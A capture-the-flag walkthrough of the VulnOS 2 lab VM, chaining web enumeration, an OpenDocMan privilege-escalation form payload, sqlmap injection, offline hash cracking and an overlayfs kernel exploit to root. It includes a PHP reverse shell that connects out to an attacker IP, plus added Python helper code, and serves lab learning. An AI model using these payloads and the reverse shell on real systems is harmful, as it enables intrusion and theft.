VulnOS is on 192.168.57.5
Quick scan:
Nmap scan report for 192.168.57.5
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
MAC Address: 08:00:27:16:B1:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
I checked the website:
If I follow the link, I get an e-commerce website:
Not much there for now.
Checking robots.txt... Found a lot of things:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
However, some of these files/folders are not accessible (clean URLs) or are restricted:
The source of the page indicates that it is running Drupal 7:
<meta name="Generator" content="Drupal 7 (http://drupal.org)" />
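Rather than reading the robots.txt by eye, the same fingerprinting can be scripted. The block below is an added example, not code from the original write-up: it parses the Disallow entries, scores how many Drupal 7 core paths they expose, extracts the Generator meta tag, and can probe each disallowed path against the target to see which ones actually answer. SAMPLE_ROBOTS is the directive part of the robots.txt recovered above, trimmed to the first three sections; the Drupal marker set and the probe User-Agent are my own choices.

```python
"""Added example (not from the original write-up): robots.txt driven
fingerprinting of a Drupal install and a path prober for what it exposes."""
import re
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Paths that ship with Drupal 7 core.  Seeing most of them in robots.txt is a
# fingerprint on its own, before the <meta name="Generator"> tag confirms it.
DRUPAL7_MARKERS = {
    "/includes/", "/misc/", "/modules/", "/profiles/", "/scripts/", "/themes/",
    "/CHANGELOG.txt", "/cron.php", "/install.php", "/update.php",
    "/xmlrpc.php", "/INSTALL.txt", "/MAINTAINERS.txt", "/UPGRADE.txt",
}

# Directive part of the robots.txt found on the box (three sections kept).
SAMPLE_ROBOTS = """\
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
"""


def parse_disallow(text):
    """Return the Disallow targets, ignoring comments and blank lines."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"disallow\s*:\s*(\S+)", line, re.IGNORECASE)
        if m:
            paths.append(m.group(1))
    return paths


def drupal7_score(paths):
    """Fraction of the Drupal 7 marker set that appears in the disallowed paths."""
    return len(DRUPAL7_MARKERS.intersection(paths)) / len(DRUPAL7_MARKERS)


def generator_tag(html):
    """Pull the Generator value from page source, e.g. 'Drupal 7 (http://drupal.org)'."""
    m = re.search(r'<meta\s+name="generator"\s+content="([^"]*)"', html, re.IGNORECASE)
    return m.group(1) if m else None


def probe(base_url, paths, timeout=5):
    """Map each path to the HTTP status the server returns (None on connection error).
    This one talks to the network and is not exercised offline."""
    results = {}
    for path in paths:
        req = Request(base_url.rstrip("/") + path, headers={"User-Agent": "Mozilla/5.0"})
        try:
            results[path] = urlopen(req, timeout=timeout).status
        except HTTPError as err:
            results[path] = err.code
        except URLError:
            results[path] = None
    return results


if __name__ == "__main__":
    found = parse_disallow(SAMPLE_ROBOTS)
    print(len(found), "disallowed paths, Drupal 7 score", drupal7_score(found))
```

Since the Drupal install on this box lives under /jabc/ (the gobuster run against that prefix is what turns up /misc, /modules and friends), the prober is called as probe("http://192.168.57.5/jabc", parse_disallow(robots_text)); a 403 on /install.php or /update.php is the "restricted" case mentioned above, a 200 on /CHANGELOG.txt gives the exact core version.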
Let's try gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5/jabc
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/jabc/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:35:56 Starting gobuster
=====================================================
/templates (Status: 301)
/misc (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/scripts (Status: 301)
/sites (Status: 301)
/includes (Status: 301)
/profiles (Status: 301)
=====================================================
2019/05/29 11:37:15 Finished
=====================================================
and
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.57.5
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.57.5/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/29 11:36:06 Starting gobuster
=====================================================
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
2019/05/29 11:37:27 Finished
Nothing there!
I went back to jabc and found this:
But when I try to access it, I receive an empty response.
Tried the login page and sent it to Burp:
POST /jabc/?q=user/login/ HTTP/1.1
Host: 192.168.57.5
User-Agent: Mozilla/4.0 (compatible; Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060414; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.57.5/jabc/?q=user/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
Cookie: has_js=1; SESS44909b7d2458c4a03ee24e5944921617=EQ2aVhZRa0Mnu0vb1oHH_8bDB3b69zYURxi9ZFaityc
Connection: close
Upgrade-Insecure-Requests: 1
name=erik&pass=ckp9rvq2&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in
Then tried wfuzz:
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt --hc 186 -d "name=admin&pass=FUZZ&form_build_id=form-7E_t5yiux-kbs2Li3AdGhr4BVtJnimp9ocIZl2XPavw&form_id=user_login&op=Log+in" http://192.168.57.5/jabc/ > /root/boxes/VulnOS2/fuzz.txt
Nothing
Went back to the webpage and check Documentation.
In the page source, there is a new URL and a guest login/password:
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>
I did login as guest.
Then I searched for an exploit:
2) Improper Access Control in OpenDocMan: CVE-2014-1946
The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user's profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
The exploitation example below assigns administrative privileges for the current account:
<form action="http://[host]/signup.php" method="post" name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name="id" value="[USER_ID]">
<input type="submit" name="login" value="Run">
</form>
Modified guest to be admin. But still not enough privileges.
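The advisory's form works because signup.php takes the admin flag and the target id straight from the POST body without asking who is submitting it. The block below is an added example and not OpenDocMan's code: a minimal Python model of that handler, once as the advisory describes it and once with the two missing authorization checks, plus the advisory's payload as a URL-encoded body. The user table, session ids and function names are constructed for the example; the field names follow the advisory's form.

```python
"""Added example, not OpenDocMan's code: a model of the CVE-2014-1946
profile-update handler, vulnerable and fixed, with the advisory's payload."""
from urllib.parse import parse_qs, urlencode


def fresh_users():
    """Constructed stand-in for the odm_user table: id -> record."""
    return {
        1: {"username": "webmin", "admin": 1},
        2: {"username": "guest", "admin": 0},
    }


def parse_form(body):
    """Flatten an application/x-www-form-urlencoded body to {name: value}."""
    return {k: v[0] for k, v in parse_qs(body).items()}


def exploit_form(user_id):
    """The advisory's hidden-form payload as a POST body for /signup.php."""
    return urlencode({"updateuser": "1", "admin": "1", "id": str(user_id), "login": "Run"})


def update_user_vulnerable(users, session_uid, form):
    """Trusts the form completely: no check on who is asking, or for whom."""
    if form.get("updateuser") != "1":
        return "noop"
    target = int(form["id"])
    if "admin" in form:
        users[target]["admin"] = int(form["admin"])  # privilege chosen by the caller
    return "updated"


def update_user_fixed(users, session_uid, form):
    """Same flow with the authorization the vulnerable version lacks."""
    if form.get("updateuser") != "1":
        return "noop"
    target = int(form["id"])
    caller_is_admin = users[session_uid]["admin"] == 1
    # Non-admins may only edit their own profile ...
    if target != session_uid and not caller_is_admin:
        return "forbidden"
    # ... and never the privilege field, whatever the form carries.
    if "admin" in form and not caller_is_admin:
        return "forbidden"
    if "admin" in form:
        users[target]["admin"] = int(form["admin"])
    return "updated"


if __name__ == "__main__":
    payload = parse_form(exploit_form(2))          # guest (id 2) promoting itself
    table = fresh_users()
    print("vulnerable:", update_user_vulnerable(table, 2, payload), table[2])
    table = fresh_users()
    print("fixed:     ", update_user_fixed(table, 2, payload), table[2])
```

The session cookie from the guest login is what makes the request "authenticated"; the id value is the guest account's own id, which the profile page reveals. In the fixed variant the mass-assignment of admin is refused even when the caller only edits their own record, which is the check the real application was missing.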
I tried to upload a php script but it is refused due to mime type control.
However, I can modify the webmin user's password.
Bingo! Admin!
(Login webmin, password admin)
I uploaded my reverse shell PHP code:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.124/443 0>&1'");
?>
and ran nc -lvnp 443 on my Kali box.
But I still cannot get the PHP to execute.
Checked the settings and found the dataDir.
But files are stored with a .dat extension, so I still cannot execute PHP.
I tried to upload it as reverse.php.png.
But I still cannot execute it.
/var/www/html/jabcd0cs/uploads/
Searching for vulnerabilities:
OpenDocMan 1.3.4 - 'search.php where' SQL Injection | exploits/php/webapps/46500.txt
Trying sqlmap to enumerate the webmin password:
sqlmap --url "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs
Then finding the user table and finally grabbing the password hash for webmin.
Once the hash is cracked: webmin1980
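Cracking the dumped hash does not need a live target, so this step is easy to reproduce. The block below is an added example, not part of the write-up: it identifies the digest by length, then runs a small wordlist through a few mangling rules (case changes, a year, short digit suffixes) until a candidate's digest matches. It assumes OpenDocMan keeps an unsalted MD5 of the password; TARGET_HASH is constructed by hashing "webmin1980" and the wordlist is constructed too, so the example runs without the real dump.

```python
"""Added example, not from the write-up: offline wordlist cracking of an
unsalted password hash, with simple mangling rules."""
import hashlib


def hash_of(text, algo="md5"):
    """Hex digest of text under a hashlib algorithm name."""
    return getattr(hashlib, algo)(text.encode()).hexdigest()


TARGET_HASH = hash_of("webmin1980")  # constructed sample, stands in for the sqlmap dump
BASE_WORDS = ["password", "admin", "webmin", "jabc", "guest"]  # constructed wordlist


def identify_hash(hex_digest):
    """Length-only guess, enough to pick a hashlib constructor for hex digests."""
    return {32: "md5", 40: "sha1", 64: "sha256"}.get(len(hex_digest))


def mangle(word):
    """Yield the word plus common variants: case changes, a year, digit suffixes."""
    for w in {word, word.lower(), word.capitalize(), word.upper()}:
        yield w
        for year in range(1970, 2021):
            yield f"{w}{year}"
        for n in range(100):
            yield f"{w}{n}"
            yield f"{w}{n:02d}"
        yield w + "!"
        yield w + "123"


def crack(target_hex, words, algo=None):
    """Return the first candidate whose digest matches target_hex, else None."""
    target = target_hex.strip().lower()
    algo = algo or identify_hash(target)
    if algo is None:
        raise ValueError("unrecognised digest length")
    for base in words:
        for cand in mangle(base):
            if hash_of(cand, algo) == target:
                return cand
    return None


if __name__ == "__main__":
    print(identify_hash(TARGET_HASH), crack(TARGET_HASH, BASE_WORDS))
```

The rule set is deliberately tiny; the point is that "username plus year" is a pattern worth trying first when the username is already known from the same dump. For anything beyond a toy list, hand the hash to hashcat or john instead.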
Then SSH into the box:
ssh webmin@192.168.56.104
webmin@192.168.56.104’s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Tue Jun 4 15:20:49 CEST 2019
System load: 0.0 Processes: 84
Usage of /: 5.8% of 29.91GB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.56.104
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Tue Jun 4 15:20:49 2019 from 192.168.56.1
Getting a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Then checking the OS version:
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.4 LTS
Release: 14.04
Codename: trusty
searchsploit:
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege | exploits/linux/local/37292.c
Compile the code and execute:
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ gcc -o test test.c
webmin@VulnOSv2:/var/www/html/jabcd0cs/uploads$ ./test
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
# cd /root
# alias ll="ls -al"
# ll
total 36
drwx------ 3 root root 4096 May 4 2016 .
drwxr-xr-x 21 root root 4096 Apr 3 2016 ..
-rw------- 1 root root 9 May 4 2016 .bash_history
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
drwx------ 2 root root 4096 May 2 2016 .cache
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
-rw------- 1 root root 3 May 2 2016 .psql_history
-rw------- 1 root root 735 May 4 2016 .viminfo
-rw-r--r-- 1 root root 165 May 4 2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?